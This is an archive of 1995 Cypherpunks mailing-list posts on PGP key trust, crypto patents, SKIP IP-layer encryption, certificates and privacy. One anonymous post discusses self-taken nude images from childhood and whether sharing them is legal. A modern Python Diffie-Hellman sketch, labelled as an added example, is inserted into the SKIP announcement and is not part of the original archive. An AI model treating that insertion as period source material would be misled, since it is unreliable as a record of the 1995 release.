cryptanalysis_; how good are the >ones that Jetico is selling, what credentials do they have to >convince us their cryptanalysis is good enough, and why are they >doing parts of it in hardware? Based on the few articles I've read, S-Boxes are generated randomly, or (doubtful in this case) generated from the passphrase, making an even larger keyspace. 
--Rob From anon-remailer at utopia.hacktic.nl Tue Nov 28 12:37:04 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 29 Nov 1995 04:37:04 +0800 Subject: NOISE: kidporn (was Re: crypto for porno users) Message-ID: <199511282024.VAA29706@utopia.hacktic.nl> Moroni wrote: > It is the most victimizing of all crimes and I think of speak for some of > us when I say that it would be better if we all found a way to get back > to discussing the problems of cryptography as related to we not > pornographers. i have some nude pics i took of myself when i was twelve. i don't *feel* victimized. maybe i was victimized but didn't know it? gandalf. PS. is it a crime for me to keep these pics? if the cops find them in my locker, will i get busted? what happens if i give them to someone? is that a crime? From rah at shipwright.com Tue Nov 28 12:44:03 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 29 Nov 1995 04:44:03 +0800 Subject: e$: Moof! (Hettinga Speaks at Apple) Message-ID: God help us all. I've been invited to the CyberDog Coding Retreat next week at Apple Computer in Cupertino. Getting flown out there is cool. Hanging with the more clueful Mac Internet types and getting to kibitz and watch (I like to watch!) them code OpenDoc parts for the internet from 8AM to midnight plus, subsisting on Dew and Pizza is really way cool. Even getting some mac.cypherpunks in the door to code crypto parts is extremely cool. But... They've asked me to give a "talk". All by myself. In an auditorium. With an audience, I mean. With publicity. I feel like Hoffman in Rain Man... V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate, here... Sooo. I've been told I can have friends in the audience. That's cool. As many friends as I want. That's even cooler. I can even have reinforcements up on the rostrum. That's extremely cool.
So, while I work on the "reinforcements up on the rostrum" part, *please* come and help me explain this stuff to the rest of the Apple community. I've appended the actual poster copy, with the relevant details, below. The poster, and its copyright-violating picture of Grommit the Dog are also found on the web at: http://thumper.vmeng.com/pub/rah/talk.html Cheers, Bob Hettinga ----------------------- Geodesic Software and Financial Cryptography for Dogs Robert Hettinga 12 PM, Dec 6th 1995, Town Hall, R&D4 Robert Hettinga (really, nobody you ever heard of), will talk about the internet as a geodesic network and information surfactant, about OpenDoc as geodesic software and code surfactant, about really frightening stuff like strong cryptography on public networks and the four horsemen of the infoclypse, about digital cash and bearer certificates, and finally, about why teaching CyberDog how to do financial cryptography is so important. See this 350lb guy jump up and down and blather on for at least an hour about anonymous transactions, about the disappearance of the capital markets as we know them, the rise and fall of the pyramid as communication metaphor, and how to raise Bucky Fuller from the dead. Learn why you should teach your code to surfact any application "suite" into little bitty pieces, to send you cash in the mail no matter where you are, and to make the whole status quo (everywhere!) disappear in a cloud of self-organized chaos. Cryptoanarchy. Right here in Cupertino, folks. See you there... ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional."
--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From cme at TIS.COM Tue Nov 28 13:05:36 1995 From: cme at TIS.COM (Carl Ellison) Date: Wed, 29 Nov 1995 05:05:36 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: <9511282030.AA04051@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Tue, 28 Nov 1995 11:43:34 -0800 (PST) >From: Raph Levien >> It would acquire a meaning by being associated with some message or set of >> messages: >> >> a) an attribute testimony (signed by someone with known authority to >> specify such an attribute -- the equivalent of a certificate) > >This is the induction case, not the base case. It assumes that you've >already got a bunch of trusted public keys in your database. It also >assumes the willingness of the owners of those public keys to sign new >keys. See, now they've got the same problem of trying to determine >whether the key is valid. Turtles all the way down. Of course. This isn't the base case. We would have some keys which I sign based on my own personal knowledge; things handed to me by people I know; some possibly published in the paper where the real key owner would see the claim and be able to contest it. PGP today comes shipped with some keys to provide the base for a chain of key signatures, but there's no verification of PRZ's or JIS's keys. One has to prime the mesh somehow. I personally prime it by having some keys (or fingerprints) exchanged face to face with people I know -- and having others acquired by association with signed messages (b). I don't have any yet whose trust has been acquired by attribution (a), since we don't have that machinery set up yet. BTW -- PGP currently lacks a way for me to note, when I sign a key, how it is that I trust that key (by personal meeting, by attribution, by message association, ...).
A signed attribute record would let me record that information for myself as well as for others. >> b) a set of messages signed by the key in question (tying the key to >> the source material from which the user formed his/her impression >> of the sender) > >There being no reason, of course, why Mallet couldn't just sign all that >stuff with his own signature. Here, you're relying on the ability of data >to authenticate itself. Here I'm talking about people I "meet" and "get to know" based strictly on my own e-mail conversations with them. For such people, there is no other evidence. If it weren't for those messages, these people effectively wouldn't exist in my world. These messages define the people in question. Stated another way: I want to communicate with Alice. I don't want to communicate with Bob. I've never met Alice but I have an address for her and a public key. Alice --- Bob --- Carl shows Bob as an active eavesdropper, controlling all of Alice's channels, blocking release of her real key, announcing a key he controls under her name to the rest of the world. By contrast, Alice --- Bob --- Carl shows Bob as Alice's secretary, who has been given the job, by Alice, of reading all Alice's mail, choosing which to pass along to her and answering all the others. Alice has generated a key for herself and has given the private key to Bob so that he can sign for her and read all her mail. Alice could even have that key certified as hers within some massive X.509 hierarchy -- doing that before she gave the private key to Bob. I know of no crypto protocol which will distinguish one from the other unless I have a private channel to Alice at some time -- but that contradicts the original assumption that I've never met her. In both cases, the person I think of as Alice is really (Alice --- Bob) --- and that's the "person" I learn to trust or not to trust. That's the "person" for whom I attach an alias to the public key. 
- Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From dan at milliways.org Wed Nov 29 05:10:29 1995 From: dan at milliways.org (Dan Bailey) Date: Wed, 29 Nov 95 05:10:29 PST Subject: Elliptic curves, patent status? Message-ID: <199511291310.NAA27164@pop01.ny.us.ibm.net> On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote: >At 05:16 PM 11/28/95 -0400, Michael Smith wrote: >> >> I'm unclear about the patent status of elliptic curve >> systems. Are they covered by the Diffie-Hellman patent? >> That is, is the lnguage of this patent broad enough to >> cover _all_ public-key systems, regardless of their >> mathematical basis? > >No, but RSA will litigate you with the objective of >inflicting extravagant legal costs regardless. From dan at milliways.org Wed Nov 29 05:11:55 1995 From: dan at milliways.org (Dan Bailey) Date: Wed, 29 Nov 95 05:11:55 PST Subject: Elliptic curves, patent status? Message-ID: <199511291311.NAA21044@pop01.ny.us.ibm.net> On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote: >At 05:16 PM 11/28/95 -0400, Michael Smith wrote: >> >> I'm unclear about the patent status of elliptic curve >> systems. Are they covered by the Diffie-Hellman patent? >> That is, is the lnguage of this patent broad enough to >> cover _all_ public-key systems, regardless of their >> mathematical basis?
> >No, but RSA will litigate you with the objective of >inflicting extravagant legal costs regardless. Does the patent create any headaches for elliptic curve research or publishing elliptic curve papers, or just for new products? Dan From froomkin at law.miami.edu Tue Nov 28 13:15:04 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Wed, 29 Nov 1995 05:15:04 +0800 Subject: Draft paper on anonymity, E$ and other stuff Message-ID: Now available for download: a draft of my latest paper, Flood Control on the Information Ocean: Living With Anonymity, Digital Cash, and Distributed Databases. I'd like your comments please, especially if you can send them soon. The paper is available in a postscript file (966K) or a compressed postscript file (253 K) by clicking on links from my homepage: http://www.law.miami.edu/~froomkin/ocean.ps http://www.law.miami.edu/~froomkin/ocean.ps.Z A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From dlv at bwalk.dm.com Tue Nov 28 13:20:54 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 29 Nov 1995 05:20:54 +0800 Subject: The future will be easy to use In-Reply-To: <199511272224.QAA20539@spirit.sctc.com> Message-ID: zuhn at sctc.com (david d `zoo' zuhn) writes: > On the technical side, what piece of software do we need for privacy? One thing that David didn't mention is security add-ons to the "network computers" that are supposed to be rolled out within the next few months -- the successors to X terminals, $500 boxes with a good screen/sound, cheap cpu, and a few megs of ram and flash memory to hold a web browser. I expect some folks to make a good living by writing add-ons (including crypto add-ons) to these gizmos. --- Dr. 
Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Tue Nov 28 13:36:43 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 29 Nov 1995 05:36:43 +0800 Subject: (fwd) Like FV with Crypto ... 'Cept Different ... Message-ID: --- begin forwarded text To: www-buyinfo From: Andrew Barrett/CheckFree Corporation Date: 28 Nov 95 9:32:28 EDT Subject: Like FV with Crypto ... 'Cept Different ... Mime-Version: 1.0 SAN RAFAEL, Calif., Nov. 22 /PRNewswire/ -- SBT's Internet Division today announced that its electronic storefront package, WebTrader 2.0, will integrate with Checkfree's credit card processing service providing a complete, secure Internet commerce solution. The combination of SBT's WebTrader and Checkfree's Electronic Payment Processing service allows any company to sell products on the Internet, automate order entry and fulfillment and receive credit card payments electronically. PR balloon deflated The Internet commerce solution process will be initiated by a merchant contacting an SBT Internet Business Consultant (IBC) who will install and configure Web Trader and provide the client with the Checkfree Merchant Application package. The IBC will arrange for a Checkfree account manager to be assigned to the account who will assist with the application process. The IBC will then customize and modify the Web Trader application, and tailor Checkfree's processing to the merchant's specific needs. Once the application has been processed and approved, the IBC will coordinate site testing for credit card transactions. At that point the merchant is equipped to conduct business on the Internet. WebTrader is the most widely-installed Windows program that allows businesses to create an electronic storefront with order forms for products or services on the Web. It automatically processes the orders and sends the customer confirmation via e-mail. 
WebTrader initiates and completes the sales process by providing a direct, instantaneous connection between vendor and customer, RSA Data Security's encryption software which keeps credit card numbers and other sensitive data private once it is received by the vendor's Web server. WebTrader includes several HTML templates for home pages and sales order forms that are ready to run on the Web. When a customer on the Web completes a form, the information is sent to the vendor via Internet e-mail. The vendor employs an integrated e-mail parsing program that automatically transforms the message into a standard SBT Sales Orders' bid. After the bid is authorized, it is converted to a firm order and an e-mail message confirming receipt of the order is sent via Internet to the customer. WebTrader also includes the ability to capture and track other critical business information such as sales leads, product registration and customer surveys. WebTrader can be used as a stand-alone Internet application or in conjunction with SBT's Pro Series 3.0i accounting software. WebTrader has a suggested retail price of $1,295. ->Finger abarrett at ee.net for Keyprint ->Public Key Coming Soon to a Keyserver Near You! --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From nowhere at bsu-cs.bsu.edu Tue Nov 28 14:15:57 1995 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Wed, 29 Nov 1995 06:15:57 +0800 Subject: No Subject Message-ID: <199511282157.QAA10096@bsu-cs.bsu.edu> Is this list archived so that I can try to look stuff up before asking stupid questions? 

From s1113645 at tesla.cc.uottawa.ca Tue Nov 28 14:48:43 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 29 Nov 1995 06:48:43 +0800
Subject: Archives?
Message-ID:

On Tue, 28 Nov 1995, Anonymous wrote:
> Is this list archived so that I can try to look stuff up before asking
> stupid questions?

You can run lycos searches on its contents.

From smithmi at dev.prodigy.com Tue Nov 28 14:51:45 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Wed, 29 Nov 1995 06:51:45 +0800
Subject: Elliptic curves, patent status?
Message-ID: <199511282216.RAA17432@tinman.dev.prodigy.com>

I'm unclear about the patent status of elliptic curve systems. Are they covered by the Diffie-Hellman patent? That is, is the language of this patent broad enough to cover _all_ public-key systems, regardless of their mathematical basis?

--Michael Smith
smithmi at dev.prodigy.com

From adam at lighthouse.homeport.org Tue Nov 28 14:55:03 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 29 Nov 1995 06:55:03 +0800
Subject: Cypherpunk archives
Message-ID: <199511282224.RAA13088@homeport.org>

>Is this list archived so that I can try to look stuff up before asking
>stupid questions?

see http://www.hks.net/cpunks/index.html

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From perry at piermont.com Tue Nov 28 15:43:38 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 07:43:38 +0800
Subject: No Subject
In-Reply-To: <199511282157.QAA10096@bsu-cs.bsu.edu>
Message-ID: <199511282257.RAA00774@jekyll.piermont.com>

Anonymous writes:
> Is this list archived so that I can try to look stuff up before asking
> stupid questions?

Yes. Check www.hks.net (I think -- maybe it's hks.com).
.pm From mdiehl at dttus.com Tue Nov 28 15:44:57 1995 From: mdiehl at dttus.com (Martin Diehl) Date: Wed, 29 Nov 1995 07:44:57 +0800 Subject: Cypherpunks Archives [WAS: no subject] Message-ID: <9510288176.AA817606611@cc1.dttus.com> On November 28, 1995: Anonymous at Internet-USA asked: > Is this list archived so that I can try to look stuff up before > asking stupid questions? Yes, you can find the archives at: http://www.hks.net/cpunks/index.html You should also read: http://www.oberlin.edu/~brchkind/cyphernomicon/ If you ask, I have another 10-20 URL's related to this subject. Martin G. Diehl From EALLENSMITH at ocelot.Rutgers.EDU Tue Nov 28 16:12:29 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Wed, 29 Nov 1995 08:12:29 +0800 Subject: Directed Hamiltonian Path Problem Message-ID: <01HY6QNMYGP08WYU3C@mbcl.rutgers.edu> From: IN%"perry at piermont.com" 28-NOV-1995 02:02:17.85 Indeed. Its the problem with innumeracy. People don't understand that if, say, a problem is O(2^N), and a problem of size 1000 requires a liter of fluid, a problem of size 2000 requires --------------------------- Now that I've looked at it a bit more, I would definitely agree... exponential growth is quite a function. Incidentally, talking about it in liters of fluid is probably not the best way to look at it, any more than computer chips can be best defined in square centimeters. But that doesn't change the essential conclusion; it just alters how big of a problem you need to use. The lesson here, I believe, is to use as large of a key/etcetera as possible... something that should be news to none, even to novices like me. Never assume that something will require too much computing power, until the computing power needed is not doable in the universe. Then add some, since (for some problems) someone might figure out a clever way around them. I worry that factoring may be one of these. 
-Allen From tcmay at got.net Tue Nov 28 17:05:29 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 29 Nov 1995 09:05:29 +0800 Subject: Directed Hamiltonian Path Problem Message-ID: At 10:48 PM 11/28/95, E. ALLEN SMITH wrote: >From: IN%"perry at piermont.com" 28-NOV-1995 02:02:17.85 > >Indeed. Its the problem with innumeracy. People don't understand that >if, say, a problem is O(2^N), and a problem of size 1000 requires a >liter of fluid, a problem of size 2000 requires >--------------------------- > Now that I've looked at it a bit more, I would definitely agree... >exponential growth is quite a function. Incidentally, talking about it in >liters of fluid is probably not the best way to look at it, any more than The reason we speak in terms of physical volumes of "Adleman computers" is to make concrete the way things scale. If the amount of Adleman computers needed to factor, say, a 2000-digit modulus (or some reasonably equivalent Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of them running for 100 years," then one has a pretty clear feel for just how futile it is to ask about "But what about if we apply MASSIVE PARALLELISM?!?!" (There's a certain well-known person who frequently raises the issue of "massive parallelism" on sci.crypt, each time revealing that he just doesn't understand that 1024 or even a million processors will not "solve" the problem for brute force attacks. Some people think there is something _magical_ about "massive parallelism.") >computer chips can be best defined in square centimeters. But that doesn't >change the essential conclusion; it just alters how big of a problem you >need to use. The lesson here, I believe, is to use as large of a key/etcetera >as possible... something that should be news to none, even to novices like me. >Never assume that something will require too much computing power, until the >computing power needed is not doable in the universe. 
Then add some, since >(for some problems) someone might figure out a clever way around them. I >worry that factoring may be one of these. I don't worry much about factoring breakthroughs. And I don't mean minor improvements, which keep occurring: I mean major breakthroughs which would make factoring a 2000-decimal-digit number "easy." Practically speaking, snarfing private keys is a helluva lot easier, for many reasons. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rmarquis at umich.edu Tue Nov 28 17:35:40 1995 From: rmarquis at umich.edu (Robert Marquis, Jr.) Date: Wed, 29 Nov 1995 09:35:40 +0800 Subject: Illustrations Message-ID: Hello. I was wondering if anyone had any .gifs or .jpgs (on the web I suppose) which illustrate how encryption works. Just simple pictures and illustrations are fine. Thanks. -Bob ____________________________________________ Robert Marquis, Jr. University of Michigan - Dearborn e-mail: rmarquis at umich.edu www: http://www.umd.umich.edu/~rmarquis From markson at osmosys.incog.com Tue Nov 28 17:40:01 1995 From: markson at osmosys.incog.com (Tom Markson) Date: Wed, 29 Nov 1995 09:40:01 +0800 Subject: SKIP Source Release is out! Message-ID: <9511290122.AA26147@monster.incog.com> Hi, Check out http://skip.incog.com. We've released the source to the SKIP key management and IP layer encryption package for SunOs 4.x. 
Here's a piece of the README file:

ALPHA 1 Release of SKIP Reference Source for SunOS 4.1.3
--------------------------------------------------------

SKIP is a Key-management protocol for IP based protocols. It is an acronym for Simple Key-management for Internet Protocols. SKIP is documented in the SKIP IETF IPSEC draft included in this directory as draft-ietf-ipsec-skip-05.txt. The most recent SKIP draft is always available at http://skip.incog.com and the Internet-Drafts directories.

From this public domain source release, you can build a fully functional IP-layer encryption package which supports DES and Triple-DES for SunOS 4.1.3. This means that every IP networked application can have its network traffic encrypted. Unlike application level encryption packages, this package encrypts IP packets. Thus, applications do not need to be recompiled or modified to take advantage of encryption.

The SKIP source is possible through the efforts of engineers in Sun Microsystems Internet Commerce Group. The developers and designers are Ashar Aziz, Tom Markson, Martin Patterson, Hemma Prafullchandra and Joseph Reveane. Linda Cavanaugh worked on the documentation.

The package compiles under both the SunPro compiler and GCC. We expect that this release should port without too much pain to any operating system which uses BSD style networking (mbufs).

A legal warning: Because this package contains strong encryption, the Software must not be transferred to persons who are not US citizens or permanent residents of the US, or exported outside the US (except Canada) in any form (including by electronic transmission) without prior written approval from the US Government. Non-compliance with these restrictions constitutes a violation of the U.S. Export Control Laws.

This source release may be used for both commercial and noncommercial purposes, subject to the restrictions described in the software and patent license statements.
Furthermore, Sun Microsystems has licensed the Stanford public key patents from Cylink Corp. which are available to users of this package on a royalty free basis. The patent statement is in README.PATENT. Be sure to read this, as it contains some restrictions and other important information.

Also included in this release is a high speed Big Number package written by Colin Plumb. bnlib/legal.c contains Colin's software license statement.

Features
--------

1. SKIP V2 compliant implementation using ESP encapsulation.
2. Support for DES/3DES for traffic and key encryption.
3. Diffie-Hellman Public Key Agreement based system.
4. Full Support for manual establishment of master keys.
5. Support for multiple NSIDs and multiple local certificates.
6. GUI tool for user friendly manipulation of access control lists and key statistics.
7. Command line tools for manipulating access control lists, etc.
8. Implementation of the Certificate Discovery protocol fully integrated into SKIP.
9. Implementation of X.509 public key certificates.
10. Implementation of DSA signature algorithm for certificate signatures.
11. Implementation for MD2, MD5 and SHA message digest algorithms.
12. Implementation of ASN.1 DER encoding/decoding.
13. SunScreen(tm) SKIP compatibility mode.
14. Implementation of hashed public keys as defined in the SKIP draft. Implementation of programs to generate hashed public keys.
15. Certificate utilities to convert X.509 Certificates to hashed keys and print both X.509 and Hashed certificates.
16. High performance Big Number library for Diffie-Hellman calculations.
17. Implementation is effectively "public domain" and may be used both commercially and non-commercially.
18. Patent Agreement with Cylink allows royalty-free use of the Diffie-Hellman and other Stanford patents with this package for commercial and non-commercial use. Read README.PATENT for some restrictions.
19. Inclusion of prime generation program used to generate the primes in SKIP draft.
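
Two of the listed features, Diffie-Hellman key agreement and hashed public keys, sketched as an added example (not code from the SKIP release or its authors). The toy prime, the byte encoding, the MD5-based master-key derivation and every function name are assumptions made for illustration; the SKIP draft defines the real formats.

```python
import hashlib
import hmac

# Constructed toy group: 2**127 - 1 is prime, but far too small for real
# use. The SKIP draft publishes its own, much larger, primes.
P = 2**127 - 1
G = 3
WIDTH = (P.bit_length() + 7) // 8


def encode(n: int) -> bytes:
    """Fixed-width big-endian bytes (assumed encoding, not SKIP's wire format)."""
    return n.to_bytes(WIDTH, "big")


def public_value(secret: int) -> int:
    """Long-term Diffie-Hellman public value g^secret mod p."""
    if not 1 < secret < P - 1:
        raise ValueError("secret exponent out of range")
    return pow(G, secret, P)


def hashed_name(pub: int) -> str:
    """Name a key by a digest of the key itself (MD5 is one digest the README lists)."""
    return hashlib.md5(encode(P) + encode(G) + encode(pub)).hexdigest()


def key_matches_name(name: str, pub: int) -> bool:
    """Accept a public value only if it is well formed and hashes to the expected name."""
    if not 1 < pub < P - 1:  # 0, 1 and p-1 would force a trivial shared secret
        return False
    return hmac.compare_digest(hashed_name(pub), name)


def master_key(my_secret: int, peer_name: str, peer_pub: int) -> bytes:
    """Pairwise master key from my secret and the peer's public value.

    Each side computes g^(ab) mod p on its own, so no key-exchange message
    is needed once the peer's public value is known and checked.
    """
    if not key_matches_name(peer_name, peer_pub):
        raise ValueError("public value does not match the expected hashed name")
    shared = pow(peer_pub, my_secret, P)
    return hashlib.md5(encode(shared)).digest()


def demo() -> dict:
    # Constructed secrets; a real deployment draws them from a CSPRNG.
    alice_secret = 0x1F3A9C5577E2046B8D10C3A2945E6F01
    bob_secret = 0x2B7E151628AED2A6ABF7158809CF4F3C
    mallet_secret = bob_secret + 1

    alice_pub = public_value(alice_secret)
    bob_pub = public_value(bob_secret)
    mallet_pub = public_value(mallet_secret)

    # Names are learned out of band (printed, read over the phone, ...).
    alice_name = hashed_name(alice_pub)
    bob_name = hashed_name(bob_pub)

    k_ab = master_key(alice_secret, bob_name, bob_pub)
    k_ba = master_key(bob_secret, alice_name, alice_pub)

    # A key substituted in transit cannot carry Bob's name.
    try:
        master_key(alice_secret, bob_name, mallet_pub)
        substitution_rejected = False
    except ValueError:
        substitution_rejected = True

    return {
        "keys_agree": k_ab == k_ba,
        "substitution_rejected": substitution_rejected,
        "bob_name": bob_name,
    }


if __name__ == "__main__":
    print(demo())
```

The name check only proves that a key is the one the name refers to; how the name itself was obtained is outside what the hash can guarantee.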

From habs at warwick.com Tue Nov 28 17:52:58 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Wed, 29 Nov 1995 09:52:58 +0800
Subject: Certificate Authorities?
In-Reply-To: <30BBB178.267A@netscape.com>
Message-ID: <199511290139.UAA02214@cmyk.warwick.com>

> We are looking at adding the ability for enterprise security
> administrators to lock various parts of the Navigator configuration
> so that the user can not change them, including stuff relating
> to trust and certificates. This functionality will not be in
> 2.0, but we do consider it important for certain customers.

As a Cypherpunk, a reporter and a corporate user of java/hot java/netscape not only should you do that but have a way of locking in various class libs.. E.g. if I want to change the security class (but don't want my users to do so..) there needs to be a way.. That SHOULD be in 2.0.

/hawk

Harry Hawk, Manager of Interactive Communications
Warwick Baker & Fiore, 212 941 4438, habs at warwick.com

The Internet has the potential to set us free -- to learn anything and do anything, whenever we want. No wonder politicians want to regulate it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation [Column], James K. Glassman

From nobody at REPLAY.COM Tue Nov 28 18:47:12 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 29 Nov 1995 10:47:12 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511290230.DAA13064@utopia.hacktic.nl>

----- wake-up rant ON -----

On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:

> At 09:52 AM 11/28/95 +0000, you wrote:
> >Anyone done anything regarding PGP hooks into Pegasus Mail?
> >I'm running it at home now (SLIPped into my Linux box), and
> >I'd like to find a way to integrate PGP into Pegasus Mail.
> >
> >Thanks in advance for any replies...
>
> Ed -
>
> I haven't heard of anything re: "PGP hooks into Pegasus
> Mail". At one time, Eudora and ViaCrypt were discussing it
> but, from what I heard, those discussions fizzled out.
> The easiest way to *integrate* is to use a front end program. I find it bizarre that what little is going on in real integration of PGP for e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest to those who should be interested. What is going on is going on with respect to Pegasus, and what mention of it there is is not on cp but on the Pegasus Mail list. Apparently cypherpunks *don't* write code, and PMail people *do*. Do a million registered users and an e-mail program with hooks already originating outside the U.S. penetrate anyone's consciousness? ----- wake-up rant OFF ----- ------------ http://www.phoenix.net/~tjunker ------------ | Your freedom is on the auction block. What do you bid? | --------------------------------------------------------- Unofficial Wang VS Information Center From stevenw at best.com Tue Nov 28 18:50:04 1995 From: stevenw at best.com (Steven Weller) Date: Wed, 29 Nov 1995 10:50:04 +0800 Subject: RISKS: Informed public opinion of automatic toll collection Message-ID: Anonymity and privacy interest: ------------------------------ Date: Tue, 21 Nov 1995 15:07:48 -0800 (PST) From: Phil Agre Subject: Resistance to intelligent traffic Public resistance to electronic road-use taxes is continually to grow worldwide. Most recently, a panel of 14 laymen assembled by Teknologi Naevnet (i.e., The Danish Board of Technology, Antonigade 4, DK-1106, Denmark, +45 33 32 05 03 -- see report number 5/1995), having been presented with arguments pro and con concerning "intelligent traffic" technologies, concluded that it "does not see any substantial economic, environmental or safety benefits from massive public investments in traffic informatics -- perhaps with the exception of public transport". 
On the issue of safety, for example, they accepted that some likely safety benefits existed, but that they had to be weighed against other potential dangers, for example that drivers' skills may deteriorate due to reliance on automation, and in any event they concluded that if safety should be improved then much more cost-effective measures were available anyway. They also raised concerns about privacy and emphasized that new legislation would have to regulate the new databases that such systems would accumulate. The report fits an emerging global pattern. When electronic road tolls and other forms of high technology that entail surveillance of citizens' movements are implemented quietly, creating a fait accompli, citizens tend to accept them fatalistically. But when any sort of democratic procedure is employed, public resistance is very stiff indeed. This phenomenon suggests two possible scenarios for the future: (1) Continued stealth implementation, leading to deepening public distrust of information technology and the organizations that control it. (2) Genuine public involvement in the social choices being made about "intelligent" roadway technologies, leading to legitimate decisions based on full public debate, and potentially as well to technological improvements (such as the use of digital cash and other technologies of anonymity) that deliver a broad range of functionality while responding appropriately to legitimate public concerns. Which scenario occurs will depend on the political culture of each country. More concretely, it will depend on the degree to which people are informed about the issues, express their concerns, and ensure that the more legitimate course is taken. Phil Agre, UCSD ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." 
stevenw at best.com | -- Time Magazine, 3 July 1995

From habs at warwick.com Tue Nov 28 19:20:12 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Wed, 29 Nov 1995 11:20:12 +0800
Subject: Certificate Authorities?
In-Reply-To: <30BBC98D.3BD3@netscape.com>
Message-ID: <199511290257.VAA00761@cmyk.warwick.com>

> This is all stuff we are looking at. It will not be in 2.0 though.
> There is a lot of functionality in 2.0 that should not have to wait
> for this.

Will knowledgeable corporate users be able to change the Security Class in 2.0 ?

--
Harry Hawk, Manager of Interactive Communications
Warwick Baker & Fiore, 212 941 4438, habs at warwick.com

The Internet has the potential to set us free -- to learn anything and do anything, whenever we want. No wonder politicians want to regulate it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation [Column], James K. Glassman

From ahupp at primenet.com Tue Nov 28 19:28:34 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:28:34 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511290315.UAA26439@usr4.primenet.com>

>Can you imagine?? I'm simply not willing to fool myself into thinking
>that I have security by posting a key and using PGP.

Unless you can post some proof that PGP is insecure, stop insisting it is.

From ahupp at primenet.com Tue Nov 28 19:46:29 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:46:29 +0800
Subject: spooky URL
Message-ID: <199511290334.UAA21094@usr5.primenet.com>

I visited their web page and what they do is record how many hits your page gets. I checked out their business partners page and it's no one I have ever heard of.
Still, it's kind of spooky because unless you notice the Netscape status line thing you don't know you're being counted. I imagine it is all put in a big database and sold to advertisers, etc.

From anonymous-remailer at shell.portal.com Tue Nov 28 21:21:18 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 29 Nov 1995 13:21:18 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511290507.VAA10591@jobe.shell.portal.com>

On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine?? I'm simply not willing to fool myself into thinking
> >that I have security by posting a key and using PGP.
>
> Unless you can post some proof that PGP is insecure, stop insisting it is.

PGP is really not the issue. The issue is more my security and the environment that I use PGP in. I don't have a trusted machine to run PGP on. Anyone who wants to can come up to machine and copy my secret keyring or they can even watch me typing my password in.

So, I don't fool myself, and I don't use PGP, except for things like exchanging a one-time pad with someone when I've already sent the message out across another delivery mechanism, like on a floppy delivered by courier.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From jlavelle at mpx.com.au Tue Nov 28 22:37:02 1995
From: jlavelle at mpx.com.au (J Lavelle)
Date: Wed, 29 Nov 1995 14:37:02 +0800
Subject: mailing list
Message-ID:

can you put me down on the list, as i have a keen interest in the subject. Thanx.....

From jhupp at novellnet.gensys.com Tue Nov 28 23:03:44 1995
From: jhupp at novellnet.gensys.com (Jeff Hupp)
Date: Wed, 29 Nov 1995 15:03:44 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <23FDF9E10F5@Novellnet.Gensys.com>

